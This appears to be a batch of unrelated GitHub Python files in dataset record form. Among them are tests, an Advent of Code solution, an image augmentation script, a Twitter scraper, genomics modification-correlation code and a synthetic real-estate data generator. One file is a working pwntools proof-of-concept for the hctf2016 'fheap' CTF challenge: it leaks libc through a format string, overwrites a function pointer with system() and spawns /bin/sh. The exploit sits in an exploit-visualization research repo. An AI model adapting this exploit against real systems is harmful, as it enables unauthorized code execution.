test_out.endswith(expected_str_end)\n","repo_name":"moj-analytical-services/data_linter","sub_path":"tests/test_logging.py","file_name":"test_logging.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"39"} +{"seq_id":"36099529150","text":"from pwn import *\n\np = process(\"./ptrace_record ./fheap\", shell=True, env={\"LD_BIND_NOW\":\"1\"})\n\n#p = remote(\"node3.buuoj.cn\", 29767)\n\nlibc = ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")\n\ncontext.terminal = ['tmux', 'splitw', '-h']\n# context.log_level = 'debug'\n\ndef dbg(breakpoint):\n gdb.attach(p, breakpoint)\n\ndef create(size, string):\n p.recvuntil(\"3.quit\\n\")\n p.sendline(\"create \")\n p.sendlineafter(\"Pls give string size:\", str(size))\n p.sendafter(\"str:\", string)\ndef delete(idx):\n p.recvuntil(\"3.quit\\n\")\n p.sendline(\"delete \")\n p.sendlineafter(\"id:\", str(idx))\n p.sendlineafter(\"Are you sure?:\", \"yes\")\ncreate(4, \"a\") # 0\ncreate(4, \"b\") # 1\n\ndelete(1)\ndelete(0)\n\ncreate(0x20, b'Start%176$pEnd'.ljust(0x18, b'c') + p8(0xB6)) # 0\n\ndelete(1)\n\np.recvuntil(\"Start\")\nlibc_start_main_ret_addr = int(p.recvuntil(\"End\", drop=True), 16)\n\nsystem_addr = libc_start_main_ret_addr + 0x24b60\n\nlog.success(\"__libc_start_main_ret address: \" + hex(libc_start_main_ret_addr))\nlog.success(\"system address: \" + hex(system_addr))\n\np.sendline(\"\")\np.sendline(\"\")\n\ndelete(0)\ncreate(0x20, b\"/bin/sh;\".ljust(24, b\"p\") + p64(system_addr))\n\ndelete(1)\n\np.interactive()\n","repo_name":"CGCL-codes/SCVDT","sub_path":"Binary-Exploit-Visualization/exploit_samples/hctf2016/poc.py","file_name":"poc.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"39"} +{"seq_id":"2012317274","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport unittest\nimport sys\nimport pp_wxh\n\ndef readGraph(fileName):\n graph = []\n with open(fileName,'r') as f:\n f.readline()\n while 1:\n line = f.readline()\n if not line:\n break\n line = line.strip('[]\\n')\n a = list(line.split(\",\"))\n a = [int(x) for x in a]\n if a[0] == -1:\n a = []\n graph.append(a)\n graph = sorted(graph, key = lambda a:(len(a),a))\n return graph\n\nclass TestPrime(unittest.TestCase):\n\n def setUp(self):\n print(\"test case start\")\n\n def test_primt(self):\n path = sys.path[0]\n pathName = path + 'anwser'+'/anwser6.txt'\n ans=readGraph(pathName)\n primePath = pp_wxh.getPrimePath()\n print(self.assertEqual(primePath.getResult(),ans))\n \n def tearDown(self):\n print(\"test case end\")\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"wangxianh/exercise","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"15840030930","text":"# from re import S\r\n# from turtle import Turtle, Screen\r\n\r\n# timmy = Turtle()\r\n# print(timmy)\r\n\r\n# timmy.shape(\"turtle\")\r\n# timmy.color(\"coral\")\r\n# timmy.fd(100)\r\n# my_screen = Screen()\r\n# my_screen.bgcolor('gray')\r\n\r\n# print(my_screen.canvheight)\r\n# my_screen.exitonclick()\r\n\r\nfrom calendar import c\r\nfrom prettytable import PrettyTable\r\ntable = PrettyTable()\r\ntable.add_column(\"Pokemon Name\", [\"Pickachu\", \"Squirtle\", \"Charmander\"])\r\ntable.add_column(\"Type\", [\"Electric\", \"Water\", \"Fire\"])\r\ntable.align[\"Pokemon Name\"] = 
\"c\"\r\ntable.align[\"Type\"] = \"c\"\r\n\r\nprint(table)\r\n","repo_name":"Chaoci/100days-Python-Projects","sub_path":"day16-coffee-machine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"2961785143","text":"import sys \nsys.path.append('..')\n\nimport copy\nfrom collections import defaultdict\nfrom helper import *\n\nFILENAME = '20_dat.txt'\nPADDING = 1\nmapper = {}\n\ndef main():\n data = readlines_split_by_newlines(FILENAME)\n alg = data[0][0]\n img = [list(dat) for dat in data[1:][0]]\n # data = [int(dat) for dat in data]\n assert(len(alg) == 512)\n # print(alg)\n # print_2d(img)\n once, outside = iter_image(img, alg, 0) # outside of initial image is 0\n # print_2d(once)\n twice, outside = iter_image(once, alg, outside)\n # print_2d(twice)\n\n print('final', count_img(twice))\n\ndef iter_image(img, alg, outside):\n new_img = [[None for j in range(len(img[0])+2*PADDING)] for i in range(len(img)+2*PADDING)]\n\n def get_old(i, j):\n old_i = i-PADDING\n old_j = j-PADDING\n if old_i < 0 or old_j < 0 or old_i >= len(img) or old_j >= len(img[0]):\n return outside\n else:\n return 0 if img[old_i][old_j] == '.' else 1\n\n for i in range(len(new_img)):\n for j in range(len(new_img[0])):\n neighbors = [\n get_old(i-1,j-1),\n get_old(i-1,j),\n get_old(i-1,j+1),\n get_old(i,j-1),\n get_old(i,j),\n get_old(i,j+1),\n get_old(i+1,j-1),\n get_old(i+1,j),\n get_old(i+1,j+1),\n ]\n code = bin_to_int(''.join([str(neighbor) for neighbor in neighbors]))\n # print(i, j, code)\n new_img[i][j] = alg[code]\n\n return new_img, 0 if (alg[0] if outside == 0 else alg[-1]) == '.' else 1\n\ndef count_img(img):\n return sum([c == '#' for c in flatten(img)])\n\n# Time: 21:46\n\ndef main2():\n data = readlines_split_by_newlines(FILENAME)\n alg = data[0][0]\n img = [list(dat) for dat in data[1:][0]]\n # data = [int(dat) for dat in data]\n assert(len(alg) == 512)\n # print(alg)\n # print_2d(img)\n outside = 0\n for i in range(50):\n img, outside = iter_image(img, alg, outside)\n # print_2d(img)\n\n print('final', count_img(img))\n\n# Time: 23:53\n\nif __name__ == '__main__':\n main()\n main2()\n","repo_name":"jautung/advent","sub_path":"advent2021/20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"28356409400","text":"from os import listdir\r\nfrom os.path import isfile\r\nfrom PIL import Image\r\nfrom tqdm import tqdm\r\nimport numpy as np\r\n\r\nimport imgaug.augmenters as iaa\r\n\r\nimport os\r\nimport random\r\nfrom os.path import join\r\nimport matplotlib.pyplot as plt\r\n\r\nDATA_DIR = 'DATA DIR'\r\nos.chdir(DATA_DIR)\r\n\r\n\r\nIMAGE_DIR = join(DATA_DIR, 'dataset\\\\PascalVOC-OG-flipped\\\\JPEGImages')\r\nANN_DIR = join(DATA_DIR, 'dataset\\\\PascalVOC-OG-flipped\\\\Annotations')\r\n\r\nNEW_IMAGE_DIR = join(DATA_DIR, 'dataset\\\\PascalVOC-OG-all\\\\JPEGImages')\r\nNEW_ANN_DIR = join(DATA_DIR, 'dataset\\\\PascalVOC-OG-all\\\\Annotations')\r\n\r\nNEW_IMAGE_SETS_DIR = join(DATA_DIR, 'dataset\\\\PascalVOC-OG-all\\\\ImageSets\\\\Main')\r\n\r\nMAX = 2\r\n\r\nwith open(join(NEW_IMAGE_SETS_DIR, f\"pipe-augmented-degrade.txt\"), 'w+') as f:\r\n pass\r\n\r\nimage_files = [f for f in listdir(IMAGE_DIR) if isfile(join(IMAGE_DIR, f))]\r\nshuffled_image_files = random.sample(image_files, len(image_files))\r\nshuffled_image_files = random.sample(image_files, 
len(shuffled_image_files))[:MAX]\r\n\r\nseq = iaa.Sequential([\r\n iaa.JpegCompression(compression=(99, 99))\r\n])\r\n\r\n\r\nfor image in tqdm(shuffled_image_files):\r\n if len(image) > 0:\r\n # Åpne bildet\r\n im = Image.open(join(IMAGE_DIR, image))\r\n\r\n # Gjøre om til array med type uint8, (1920, 1080, 3)\r\n im = np.asarray(im).astype(np.uint8)\r\n\r\n # Ekspandere arrayet til å se ut som (1, 1920, 1080, 3), nødvendig siden iaa forventer en 4D matrise\r\n im_expand = np.expand_dims(im, 0)\r\n\r\n # Augmentere bildet\r\n augmented_image_array = seq(images=im_expand)\r\n\r\n # Fjerne ekstra dimensjonen satt på tidligere på første akse, resultat: (1920, 1080, 3)\r\n augmented_image_array = np.squeeze(augmented_image_array, axis=0)\r\n\r\n # Laste inn array som bilde\r\n augmented_image = Image.fromarray(augmented_image_array)\r\n\r\n # Laste inn bildet igjen fra matriseformat.\r\n im = Image.fromarray(im)\r\n im.save('im1.jpeg')\r\n augmented_image.save('im2.jpeg')\r\n fig, ax = plt.subplots(nrows=1, ncols=2)\r\n\r\n # Plotting\r\n plt.subplot(1, 2, 1)\r\n plt.imshow(im)\r\n\r\n plt.subplot(1, 2, 2)\r\n plt.imshow(augmented_image)\r\n plt.show()\r\n\r\n","repo_name":"Laende/Bacheloroppgave-droneteknologi","sub_path":"utils/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73888884843","text":"#!/usr/bin/env python3\ndesc=\"\"\"Report correlation between all modified positions\n\nMore info at: https://github.com/lpryszcz/modPhred\n\"\"\"\nepilog=\"\"\"Author: l.p.pryszcz+git@gmail.com\nBarcelona, 3/02/2020\n\"\"\"\n\nimport glob, gzip, os, pickle, pysam, sys, zlib\nfrom collections import Counter\nfrom datetime import datetime\nfrom multiprocessing import Pool\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom guppy_encode import HEADER, VERSION, logger, memory_usage, load_info, base2complement, MaxModsPerBase\nfrom mod_report import is_qcfail, base2index, code2function\n\ncomplement = {\"A\": \"T\", \"C\": \"G\", \"G\": \"C\", \"T\": \"A\"}\n\ndef baseq2int(b, q, minModProb, MaxPhredProb, base2index=base2index, maxMods=10):\n \"\"\"Return int representation of modification\n\n For example:\n - A (base 1) with modification probability of\n - 31 will be stored as 1 (first mod of A) because 1 + 0*maxMods\n - C (base 2) with modification probability of\n - 50 will be stored as 12 (second mod of C) because 2 + 1*maxMods\n \"\"\"\n # ignore mod prob below minModProb - store as 255\n if (q%MaxPhredProb)end:\n bases -= refi-end\n if bases<1:\n break\n # process bases of aligned block\n for ii, (b, q) in enumerate(zip(a.seq[preadi:preadi+bases], a.query_qualities[preadi:preadi+bases]), prefi+1):\n if ii in pos2idx:\n # get complement if read mapped to rev strand\n if a.is_reverse: b = complement[b]\n # store most likely modification as int if larger than minModProb\n modi = baseq2int(b, q, minModProb, MaxPhredProb)\n if modi:\n #if modi<255: print(readidx, ii, pos2idx[ii], b, q, base2index[b], modi)\n #if b==\"C\" and 10000] #np.all((quals[posidx]>0, quals[posidx]<255), axis=0)]\n posidx += 1\n # store modifications from alignment blocks\n quals, readidx = store_blocks(a, start, end, pos2idx, quals, readidx, minModProb, MaxPhredProb)\n # release some more memory\n if readidx==maxDepth:\n #sys.stderr.write(\"[INFO] maxDepth reached\\n\"); break ### to be done\n first = np.argwhere(quals[posidx, 
:readidx])[0][0]\n if first<0.05*maxDepth: first = int(0.05*maxDepth)\n quals = np.hstack((quals[:, first:], np.zeros((len(positions), first), dtype='uint8')))\n sys.stderr.write(\"[INFO][%s] Dropped %s previous columns/reads\\n\"%(bam, first))\n readidx -= first\n # yield last bit of calls\n while posidx0]\n posidx += 1\n\ndef chr2modcorr(outfn, bams, region, chrdata, mapq, mindepth, minModProb, MaxPhredProb, minmodreads=10):\n \"\"\"Calculate correlation between modifications\"\"\"\n cols = [\"chr\", \"pos\", \"mod\", \"strand\"]\n # get chr and positions\n ref, positions = chrdata.chr.unique()[0], np.unique(chrdata.pos.to_numpy())\n corrs = np.zeros((len(positions), len(positions)), dtype=\"float32\")\n corrs[:] = np.nan\n logger(\" %s with %s modified positions > %s\"%(region, len(positions), outfn))\n parsers = [bam2calls(bam, ref, positions, mapq, minModProb, MaxPhredProb) for bam in bams]\n for i, calls in enumerate(zip(*parsers)):\n # stack all reads - those are already prefiltered for only those modified for given position\n calls = np.hstack(calls)\n sys.stderr.write(\" %s \\r\"%i)\n # get modified positions\n #mod = calls!=255\n # get positions with mindepth\n enoughdepth = np.where(np.sum(calls>0, axis=1)>=mindepth)[0]\n print(Counter(calls[i]), enoughdepth.sum())\n # store correlations between this positions\n for j in filter(lambda x: x>=i, enoughdepth):\n # mod in i and j and take balanced number of modified reads for each position\n modi = np.argwhere(np.all((calls[i]>0, calls[i]<255, calls[j]>0), axis=0)) #calls[i]>0, calls[i]<255 #calls[i]==1\n modj = np.argwhere(np.all((calls[j]>0, calls[j]<255, calls[i]>0), axis=0)) #calls[j]>0, calls[j]<255 #calls[j]==1\n lessmod = min(len(modi), len(modj))\n sel = np.unique(list(modi[:lessmod]) + list(modj[:lessmod]))\n if len(sel)0), axis=0)\n # skip if less than 10 reads with modification at least in 1 position\n if sel.sum()0, calls<255), axis=0)\n modreadsum = modreads.sum(axis=1) \n # get positions with mindepth\n enoughdepth = np.where(np.sum(calls>0, axis=1)>=mindepth)[0]\n # store correlations between this positions\n for j in filter(lambda x: x>=i, enoughdepth):\n # choose _i that it always has more modified positions than _j\n if np.argmax(modreadsum[[i, j]]):\n _j, _i = i, j\n else:\n _i, _j = i, j\n # select only reads modified in the position with more modifications\n # and with bases called in both\n sel = np.all((modreads[_i], calls[_j]>0), axis=0) #; print(i, j, modreadsum[[i, j]])\n # skip if less than 10 reads with modification at least in 1 position\n if sel.sum()=s, df.pos<=e), axis=0)]\n if strand:\n df = df[df.strand==strand]\n regionsData.append(df)\n return regionsData\n \ndef mod_correlation(outdir, infn, bamfiles, ext=\"png\", logger=logger, data=False,\n overwrite=False, regions=[], samples=[], \n minfreq=0.20, mindepth=10, minModProb=0.5, mapq=15,\n strand=None, mod=None):\n if not outdir:\n outdir = os.path.join(os.path.dirname(infn), \"correlations\")\n if not os.path.isdir(outdir):\n os.makedirs(outdir)\n # load info\n moddata = load_info(os.path.dirname(infn))\n MaxPhredProb = moddata[\"MaxPhredProb\"]\n if not bamfiles:\n bamfiles = moddata[\"bam\"]\n bamfiles.sort()\n # BAM > modifications\n # get can2mods ie {'A': ['6mA'], 'C': ['5mC'], 'G': [], 'T': []}\n can2mods = {b: [moddata[\"symbol2modbase\"][m] for m in mods]\n for b, mods in moddata[\"canonical2mods\"].items()}#; print(can2mods)\n #print(MaxPhredProb, can2mods, bamfiles)\n \n # parse data\n if isinstance(data, bool):\n logger(\"Loading %s 
...\\n\"%infn)\n data = pd.read_csv(infn, sep=\"\\t\", header=len(HEADER.split('\\n'))-2, index_col=False,\n dtype={\"chr\": object, \"pos\": int}) # ADD TO ALL\n # filter by min freq and depth\n mfreqcols = list(filter(lambda x: x.endswith('mod_frequency'), data.columns)); mfreqcols\n depthcols = list(filter(lambda x: x.endswith('depth'), data.columns)); depthcols\n filters = [data.loc[:, mfreqcols].max(axis=1)>minfreq, data.loc[:, depthcols].max(axis=1)>mindepth]\n # add filters for strand and modification\n if mod:\n filters.append(data[\"mod\"]==mod)\n data = data[np.all(filters, axis=0)]\n #print(data.shape, data.head())\n # limit by region AND CONSIDER LIMITING COV TO 2-3x median?\n if regions:\n # get regions logger(\" limiting to %s regions: %s\\n\"%(len(regions), \",\".join(regions)))\n regionsData = get_data_for_regions(data, regions)\n logger(\"Processing %s region(s): %s ...\\n\"%(len(regions), \",\".join(regions)[:3]))\n else:\n # get chromosomes\n regions = data.chr.unique()\n #if strand: filters.append(data.strand==strand)\n regionsData = (data[data.chr==ref] for ref in regions)\n logger(\"Processing %s chromosome(s): %s ...\\n\"%(len(regions), \",\".join(regions)[:3]))\n if data.shape[0]<1:\n logger(\"[mod_plot][ERROR] %s row(s) found in %s\\n\"%(data.shape[0], infn))\n return\n # process regions/chromosomes\n for ref, chrdata in zip(regions, regionsData):\n # define output\n fn = \"%s.csv.gz\"%ref\n if mod: fn = \"%s.%s.csv.gz\"%(ref, mod)\n outfn = os.path.join(outdir, fn)\n if overwrite or not os.path.isfile(outfn):\n # generate data\n corrs = chr2modcorr(outfn, bamfiles, ref, chrdata, mapq, mindepth, minModProb, MaxPhredProb)\n else:\n # load data\n corrs = np.loadtxt(outfn, delimiter=\",\")\n # plot\n plot_heatmap(corrs, chrdata, ref, outfn, ext=ext)\n # maybe plot below freq? 
that would be cool, right?\n\ndef collapse_axes(xlab, ylab):\n \"\"\"Return X/Y labels for unique X positions\"\"\"\n _xlab, _ylab, pos = [xlab[0]], [ylab[0]], [0]\n for i in range(1, len(xlab)):\n if xlab[i] == xlab[i-1]:\n _ylab[-1] += \"; %s\"%ylab[i]\n else:\n _xlab.append(xlab[i])\n _ylab.append(ylab[i])\n pos.append(i)\n return _xlab, _ylab, pos\n \ndef plot_heatmap(corrs, chrdata, ref, outfn, figsize=(12, 10), dim=100000, ext=\"svg\", simpleY=True):\n \"\"\"Plot heatmaps\"\"\"\n # narrow by strands\n xlab = chrdata.pos[:dim].to_numpy()\n ylab = [\"%s %s\"%(m, s) for m, s in zip(chrdata[\"mod\"][:dim], chrdata.strand[:dim])]\n mod2count = Counter(chrdata[\"mod\"])\n xlab, ylab, pos = collapse_axes(xlab, ylab)\n # use unique names on Y\n if simpleY:\n _ylab = [ylab[i] if ylab[i]!=ylab[i-1] else \"\" for i in range(1, len(ylab))]\n _ylab.insert(0, ylab[0])\n ylab = _ylab\n # switch axes labels\n #xlab, ylab = ylab, xlab\n logger(\" Plotting %s modified positions in %s:%s-%s\"%(len(chrdata), ref, xlab[0], xlab[-1]))\n #mask = np.zeros_like(corrs)\n #mask[np.triu_indices_from(mask)] = True\n #f, ax = plt.subplots(figsize=figsize)\n fig = plt.figure(figsize=figsize)\n # add title\n mcounts = \"; \".join(\"%s: %s\"%(m, c) for m, c in mod2count.items())\n fig.suptitle(\"\\n%s\\n%s modifications: %s\"%(ref, len(chrdata), mcounts))\n fig.subplots_adjust(top=0.75) \n with sns.axes_style(\"white\"):\n ax = sns.heatmap(corrs, vmin=-1, vmax=1, center=0, cmap=\"RdBu_r\", #mask=mask, #fmt=\"d\"\n xticklabels=xlab, yticklabels=ylab)\n #ax.xaxis.tick_top() \n ax.set_xlabel(\"Modified positions\")\n ax.set_ylabel(\"Modifications at those positions [with +/- strand]\")\n # calculate global frequency\n depthcols = list(filter(lambda c: c.endswith(\"depth\"), chrdata.columns))\n mfreqcols = list(filter(lambda x: x.endswith('mod_frequency'), chrdata.columns))\n mcountcols = [\"%s modcount\"%c.split()[0] for c in depthcols]\n for cc, fc, dc in zip(mcountcols, depthcols, mfreqcols):\n chrdata[cc] = chrdata[fc] * chrdata[dc]\n chrdata[\"avgfreq\"] = chrdata[mcountcols].sum(axis=1) / chrdata[depthcols].sum(axis=1)\n ax2 = fig.add_axes([.125, 0.77, .62, .10], anchor=\"N\", sharex=ax)\n ax2.bar(np.arange(len(corrs))+0.5, chrdata[\"avgfreq\"].to_numpy()[pos])\n ax2.set_ylim((0, 1)); ax2.set_ylabel(\"mod\\nfreq\")\n ax2.xaxis.tick_top() #ax2.set_xticklabels([]) #\n ax2.set_xticklabels(xlab, rotation=90)\n fig.savefig(outfn+\".%s\"%ext) #show()\n \ndef main():\n import argparse\n usage = \"%(prog)s -v\" #usage=usage, \n parser = argparse.ArgumentParser(description=desc, epilog=epilog, \\\n formatter_class=argparse.RawTextHelpFormatter)\n \n parser.add_argument('--version', action='version', version=VERSION) \n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", help=\"verbose\") \n parser.add_argument(\"-i\", \"--input\", default=\"modPhred/mod.gz\", help=\"input file [%(default)s]\")\n parser.add_argument(\"-o\", \"--outdir\", default=\"modPhred/correlations\", help=\"output dir [%(default)s]\")\n parser.add_argument(\"-b\", \"--bams\", default=[], nargs=\"*\", help=\"input BAMs [read from mod.gz]\")\n parser.add_argument(\"-m\", \"--mapq\", default=15, type=int, help=\"min mapping quality [%(default)s]\")\n parser.add_argument(\"-d\", \"--minDepth\", default=25, type=int, help=\"min depth of coverage [%(default)s]\")\n parser.add_argument(\"--minModFreq\", default=0.20, type=float, help=\"min modification frequency per position [%(default)s]\")\n parser.add_argument(\"--minModProb\", default=0.50, 
type=float, help=\"min modification probability per base [%(default)s]\")\n #parser.add_argument(\"-s\", \"--strand\", default=None, choices=[\"+\", \"-\"], help=\"select strand [include both]\")\n parser.add_argument(\"--mod\", default=\"\", help=\"filter only 1 modification [analyse all]\")\n parser.add_argument(\"-r\", \"--regions\", nargs=\"+\", default=[], help=\"regions to process [all chromosomes]\") \n parser.add_argument(\"-w\", \"--overwrite\", action=\"store_true\", help=\"overwrite existing output\") \n parser.add_argument(\"-e\", \"--ext\", default=\"svg\", help=\"figure format/extension [%(default)s]\")\n\n o = parser.parse_args()\n if o.verbose:\n sys.stderr.write(\"Options: %s\\n\"%str(o))\n\n if not o.regions:\n logger(\"Processing entire chromosomes - consider narrowing to certain regions!\")\n \n mod_correlation(o.outdir, o.input, o.bams, ext=o.ext, mapq=o.mapq,\n overwrite=o.overwrite, regions=o.regions, mod=o.mod, \n minfreq=o.minModFreq, mindepth=o.minDepth, minModProb=o.minModProb)\n logger(\"Finished\\n\")\n\nif __name__=='__main__': \n t0 = datetime.now()\n try:\n main()\n except KeyboardInterrupt:\n sys.stderr.write(\"\\nCtrl-C pressed! \\n\")\n #except IOError as e:\n # sys.stderr.write(\"I/O error({0}): {1}\\n\".format(e.errno, e.strerror))\n dt = datetime.now()-t0\n sys.stderr.write(\"#Time elapsed: %s\\n\"%dt)\n","repo_name":"novoalab/modPhred","sub_path":"src/mod_correlation.py","file_name":"mod_correlation.py","file_ext":"py","file_size_in_byte":17536,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"19"} +{"seq_id":"16747727773","text":"import requests\r\nimport os\r\nimport json\r\nfrom requests_oauthlib import OAuth1\r\nfrom auth import *\r\n\r\n#SET URL AND AUTH\r\nurl = 'https://api.twitter.com/1.1/search/tweets.json'\r\nauth = OAuth1(CONSUMER_KEY, CONSUMER_SECRET, TOKEN, TOKEN_SECRET)\r\n\r\n#GET IMPORTANT GLOBAL VAR\r\nq = input(\"Query: \")\r\nnb_r = input(\"Request's number: \")\r\n\r\n#GET QUERY\r\nquery = requests.get(url, params={'q': q, 'count': 50}, auth=auth)\r\n\r\n#SET VAR MAX & MIN\r\nmax_id = query.json()['search_metadata']['max_id'] + 2500000000000000\r\nmin_id = query.json()['search_metadata']['since_id']\r\nmax = max_id\r\nmin = min_id\r\n\r\n#SET GLOBAL VARS\r\nall_id = {}\r\nnb_t = 0\r\ntheapi = {}\r\nq_array_mrg = {}\r\n#DELETE PREVIOUS QUERIES FROM Q\r\n\r\n#SCRAPER\r\nfor i in range(int(nb_r)):\r\n querys = requests.get(url, params={'q': q, 'count': 50, 'since_id': min, 'max_id': max}, auth=auth)\r\n if 'statuses' not in querys.json():\r\n max = max + 2500000000000000\r\n min = min + 2500000000000000\r\n else:\r\n json_query = querys.json()['statuses']\r\n count_json = len(json_query)\r\n if count_json == 0:\r\n max = max + 2500000000000000\r\n min = min + 2500000000000000\r\n else:\r\n for n in range(count_json):\r\n ids = querys.json()['statuses'][n]['id']\r\n all_id[i] = ids\r\n if count_json > 0:\r\n if i == 0:\r\n print(query.json()['search_metadata']['max_id'])\r\n nb_t += count_json \r\n for n in range(count_json):\r\n querys.json()['statuses'][n]['id']\r\n id = querys.json()['statuses'][n]['id']\r\n text = querys.json()['statuses'][n]['text']\r\n created_at = querys.json()['statuses'][n]['created_at']\r\n q_array_mrg[n] = [{'id': id, 'text': text, 'created_at': created_at}]\r\n theapi['query'+str(i)] = q_array_mrg\r\n else:\r\n print(query.json()['search_metadata']['max_id'])\r\n im = i - 1\r\n is_equal = all_id[im] == all_id[i]\r\n if is_equal == True:\r\n max = max + 
2500000000000000\r\n                    min = min + 2500000000000000\r\n                else:\r\n                    nb_t += count_json\r\n                    for n in range(count_json):\r\n                        id = querys.json()['statuses'][n]['id']\r\n                        text = querys.json()['statuses'][n]['text']\r\n                        created_at = querys.json()['statuses'][n]['created_at']\r\n                        q_array_mrg[n] = [{'id': id, 'text': text, 'created_at': created_at}]\r\n                    theapi['query'+str(i)] = q_array_mrg\r\n                    max = max + 2500000000000000\r\n                    min = min + 2500000000000000\r\n\r\ndirectory = q\r\npath_dir = r\"C:\\Users\\axelz\\OneDrive\\Documents\\Epitech Digital\\Projet\\Storks\\Storks\\resources\\json\"\r\nif not os.path.exists(path_dir + \"\\\\\"+ q):\r\n    os.mkdir(os.path.join(path_dir, q))\r\nf = open(os.path.join(path_dir + \"\\\\\"+ q, q + '.json'), 'w')\r\ntotal = json.dumps(theapi)\r\nf.write(total)\r\nf.close()\r\n\r\n#ANSWER\r\nprint('The query collected ' + str(nb_t) + ' tweets')","repo_name":"AxelZouebi/D-NAT-200_2025-Axel.Zouebi","sub_path":"requests/Scrape/Twitter_scrape.py","file_name":"Twitter_scrape.py","file_ext":"py","file_size_in_byte":3331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27949624832","text":"import os\nimport pandas as pd\nimport numpy as np\nimport random\nimport datetime\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import LabelEncoder\nfrom ydata_profiling import ProfileReport\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.metrics import r2_score\n\n\ndef generate_data(path_file: str, num_rows: int) -> None:\n    data: pd.DataFrame = pd.DataFrame(columns=[\n        'ID da Propriedade', 'Tipo de Imóvel', 'Localização',\n        'Número de Quartos', 'Número de Banheiros', 'Área Total (em metros quadrados)',\n        'Idade da Propriedade', 'Condição da Propriedade', 'Amenidades', 'Preço de Venda Anterior',\n        'Data de Venda Anterior', 'Histórico de Aluguel', 'Taxas de Juros Atuais', 'Custos de Manutenção Anuais',\n        'Taxas de Condomínio Mensais', 'Impostos sobre a Propriedade', 'Histórico de Valorização',\n        'Fluxos de Caixa Anuais', 'Retorno sobre Investimento (ROI)', 'Data de Inclusão no Dataset',\n        'Fonte dos Dados'\n    ])\n\n    idade_imovel: int = np.random.randint(1, 50, num_rows)\n    preco_anterior: int = np.random.randint(50000, 5000000, num_rows)\n    area_total: float = np.random.uniform(50, 300, num_rows)\n    taxas_juros: float = np.random.uniform(2, 6, num_rows)\n    valor_alugueis: int = np.random.randint(500, 5000, num_rows)\n    custos_manutencao_anual: float = np.random.uniform(100, 5000, num_rows)\n    impostos_sobre_imovel: float = np.random.uniform(500, 5000, num_rows)\n    taxas_condominio: float = np.random.uniform(50, 500, num_rows)\n\n    roi: float = (0.2 * idade_imovel + 0.4 * preco_anterior + 0.2 * area_total + 0.3 + taxas_juros * 0.2\n                  + 0.4 * valor_alugueis + 0.3 * custos_manutencao_anual + 0.1 * impostos_sobre_imovel + 0.1 *\n                  taxas_condominio + np.random.normal(0, 2, num_rows))\n\n    for i in range(num_rows):\n        id_propriedade: int = i\n        print(i)\n\n        data = data.append({\n            'ID da Propriedade': id_propriedade,\n            'Tipo de Imóvel': random.choice(['Casa', 'Apartamento', 'Condomínio']),\n            'Localização': f'Cidade {random.randint(1, 10)}',\n            'Número de Quartos': random.randint(1, 6),\n            'Número de Banheiros': random.randint(1, 4),\n            'Área Total (em metros quadrados)': area_total[i],\n            'Idade da Propriedade': idade_imovel[i],\n            'Condição da Propriedade': random.choice(['Excelente', 'Boa', 'Média', 'Ruim']),\n            'Amenidades': ', 
'.join(random.sample(['Piscina', 'Garagem', 'Jardim', 'Vista panorâmica'], 2)),\n 'Preço de Venda Anterior': preco_anterior[i],\n 'Data de Venda Anterior': datetime.date(random.randint(1980, 2023), random.randint(1, 12),\n random.randint(1, 28)),\n 'Histórico de Aluguel': random.choice(['Sim', 'Não']),\n 'Valor aluguel': valor_alugueis[i],\n 'Taxas de Juros Atuais': taxas_juros[i],\n 'Custos de Manutenção Anuais': custos_manutencao_anual[i],\n 'Taxas de Condomínio Mensais': taxas_condominio[i],\n 'Impostos sobre a Propriedade': impostos_sobre_imovel[i],\n 'Histórico de Valorização': random.uniform(0.1, 0.5),\n 'Fluxos de Caixa Anuais': random.uniform(1000, 50000),\n 'Retorno sobre Investimento (ROI)': roi[i],\n 'Preço de Venda Atual': random.randint(50000, 5000000),\n 'Data de Inclusão no Dataset': datetime.date(random.randint(2010, 2023), random.randint(1, 12),\n random.randint(1, 28)),\n 'Fonte dos Dados': random.choice(['Zillow', 'Kaggle', 'Redfin'])\n }, ignore_index=True)\n\n data.to_csv(path_file, index=False)\n\n\ndef train_and_evaluate_decision_tree(x_treino_dt: pd.DataFrame, y_treino_dt: pd.Series, x_teste_dt: pd.DataFrame,\n y_teste_dt: pd.Series) -> None:\n decision_tree_model = DecisionTreeRegressor()\n decision_tree_model.fit(x_treino_dt, y_treino_dt)\n\n predicates = decision_tree_model.predict(x_teste_dt)\n\n score = r2_score(y_teste_dt, predicates)\n print(\"Decision tree R² Score:\", score)\n\n\ndef train_and_evaluate_linear_regression(x_treino_lr: pd.DataFrame, y_treino_lr: pd.Series, x_teste_lr: pd.DataFrame,\n y_teste_lr: pd.Series) -> None:\n linear_regression_model = LinearRegression()\n linear_regression_model.fit(x_treino_lr, y_treino_lr)\n score = linear_regression_model.score(x_teste_lr, y_teste_lr)\n print('LinearRegression: ', score)\n\n\nif __name__ == '__main__':\n path: str = './data/dataset_imobiliario.csv'\n if not os.path.isfile(path):\n generate_data(path, 10000)\n\n df: pd.DataFrame = pd.read_csv(path)\n profile: ProfileReport = ProfileReport(df, title=\"Profiling Report\")\n 